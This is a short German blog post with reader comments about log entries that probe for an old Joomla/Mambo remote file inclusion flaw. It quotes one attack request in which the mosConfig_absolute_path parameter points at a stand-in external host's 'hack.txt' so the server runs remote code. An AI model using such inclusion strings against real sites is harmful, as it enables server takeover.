Blogkultur:

Joomla CMS Hack

Ich nutze hier im Blog definitiv WordPress, aber zahlreiche Anfragen werden auf nicht-existente URLs gemacht, die wohl irgendwie eine Hintertür beim Joomla CMS öffnen sollen. Hier ein Beispiel:

/////////////?mosConfig_absolute_path=http://sonstwo.server.com/hack.txt

Scheinbar ist die mosConfig_absolute_path im Joomla CMS oder in veralteten Versionen absolut anfällig für zwischenmenschliche Schandtaten… naja, das wollte ich auch nur mal so mitteilen.

6 Kommentare

  1. Kann ich nur Bestätigen (die Einbruchsversuche)… allerdings scheinen die Täter nicht viel Know-How zu besitzen…

  2. Ich möchte ja fast diese dilletantistischen Momente so richtig an den Pranger stellen und die IPs preisgeben, aber näää… :P

  3. Ich veröffentliche manchmal Anweisungen für die .htaccess-Datei… das befriedigt auch ;-)

  4. Diese bots tun nix, die wollen nur spielen. grep mal nach tikiwiki.
    So, ick muss twittern.

  5. Mir graut es jedesmal wenn ich in meine Logfiles schaue. Was da an “Angriffen” reinkommt ist nicht mehr lustig und es wird subjektiv immer mehr.

    @Moellus:

    Ist das gemeint: “Eine Schwachstelle in TikiWiki 1.9.8 kann von einem Angreifer dazu ausgenutzt werden, beliebigen Programmcode auf dem beherbergenden Rechnersystem auszuführen. Es ist bereits funktionierender Exploit Code in Umlauf und die Schwachstelle wird bereits aktiv ausgenutzt. Es ist noch kein Patch verfügbar, …”?

  6. Xel:

    Och - das ist ne alte Lücke… müsste aber schon lange gestopft sein… (wobei denkbar währe, dass es eigentlich eher ne Mambo Lücke war - kann ich aber nicht genau sagen) so ungefähr seit Joomla eine Register Globals = “Off” Emulation hat ;-)

    “allerdings scheinen die Täter nicht viel Know-How zu besitzen…”
    Glaubst du? Es ist weniger Aufwand den “Hack”versuch direkt zu begehen, als erst die Startseite zu laden und zu versuchen herauszufinden, ob denn das Zielsystem installiert ist.

    Was IPs angeht… Botnetze und Zobierechner sowie wechselnde IPs machen einem das Leben manchmal zur Hölle, wenn man IPs blocken möchte ;-)

Diesen Artikel kommentieren




Hinweis: Beachte bitte vor dem Absenden deines neuen Kommentars den entsprechenden Hinweis zu manuellen Trackbacks und zu Kommentaren mit werblichem Charakter.

Kopiere diesen Trackback Link in deine Blogsoftware um auf diesen Artikel hinzuweisen. Für die eigentliche Verlinkung zu diesem Artikel nutze den Permalink innerhalb deines Blogeintrages.

Du kannst auch den Kommentar-Feed nutzen um die Kommentare zu diesem Artikel zu verfolgen.


  • Werbeanzeigen

  • Networking

    • XING
    • View Mike Schnoor's profile on LinkedIn
  • Flickr Bilder

  • Über den Autor

    Mein Name ist Mike Schnoor und ich präsentiere dem frivolen Internetuser ein erstklassig privat geführtes Medienblog. Die Themen siedeln sich zentral in der Medienwelt an: Web 2.0, Weblogs, Video on Demand, TV, Radio, Print, Medien, Marketing und Kommunikation.

    Wer anderer Meinung ist, erreicht mich schnell über das Kontaktformular oder darf noch ein wenig weiter über alles lesen.

  • Blog Statistik

    • Online seit: 11.12.2003
    • Artikel: 2394
    • Kommentare: 7028
    • Kategorien: 28
    • Tags: 3366
    • blogoscoop